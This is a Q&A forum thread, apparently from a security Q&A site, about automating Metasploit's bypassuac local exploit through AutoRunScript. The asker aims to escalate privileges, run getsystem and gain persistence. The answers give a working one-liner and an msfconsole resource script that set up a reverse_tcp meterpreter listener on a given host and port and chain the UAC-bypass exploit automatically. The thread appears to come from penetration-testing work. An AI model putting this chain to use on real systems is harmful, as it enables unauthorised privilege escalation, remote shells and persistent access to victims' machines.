How to run exploit/windows/local/bypassuac using AutoRunScript?

Question

Is there a way to run exploits that require parameters, such as the one in the title, using AutoRunScript?

I was able to use AutoRunScript to execute some post commands perfectly, such as keylog_recorder or checkvm.

But when I added the my script this:

use exploit/windows/local/bypassuac
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
set LPORT 443
set DisablePayloadHandler true
set SESSION 1
set TECHNIQUE EXE
set ExitOnSession false
exploit

I got this:

[*]     Running command use exploit/windows/local/bypassuac
Loading extension exploit/windows/local/bypassuac...
[-] Failed to load extension: No module of the name ext_server_exploit/windows/local/bypassuac.x86.dll found
[*]     Running command set TARGET 0
[-] Unknown command: set.
[*]     Running command set PAYLOAD windows/meterpreter/reverse_tcp
[-] Unknown command: set.

Clearly I'm missing something here. How can I do this? My objective is to be able to bypass UAC, use getsystem and then get a foothold using the persistence options.

As a side note, I understand that using "set SESSION 1" will only work for the first computer in the engagement. I would need to somehow use a variable to refer to the session that is currently initiating.

Anyone has any solutions for this?

score 3 · Answer 1 · answered Nov 12 '15 at 06:16

3

You need to give the options directly where you are setting the AutoRunScript.

msf exploit(handler) > set AutoRunScript exploit/windows/local/bypassuac LHOST=192.168.0.1 LPORT=443

answered Nov 12 '15 at 06:16

void_in

5,541
1
20
28

score 1 · Answer 2 · answered Nov 04 '15 at 01:02

You cannot execute those commands in a AutoRunScript because they are commands to the msfconsole, while the AutoScriptRun works only on the context of meterpreter. So, you'd need something like these:

#msfconsole.rc
   #Configure your listener and payload
   use multi/handler
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.0.1
   set LPORT 443
   set AutoRunScript auto.rc
   exploit -j
   use exploit/windows/local/bypassuac
   set TARGET 0
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.0.1
   set LPORT 443
   set DisablePayloadHandler true
   set SESSION 1
   set TECHNIQUE EXE
   set ExitOnSession false
   #here you can also set another AutoRunScript for your new payload
   exploit

And on the auto.rc you can put things like:

#auto.rc

sysinfo
checkvm

And any other meterpreter command or post module.

How to run exploit/windows/local/bypassuac using AutoRunScript?

2 Answers2

Linked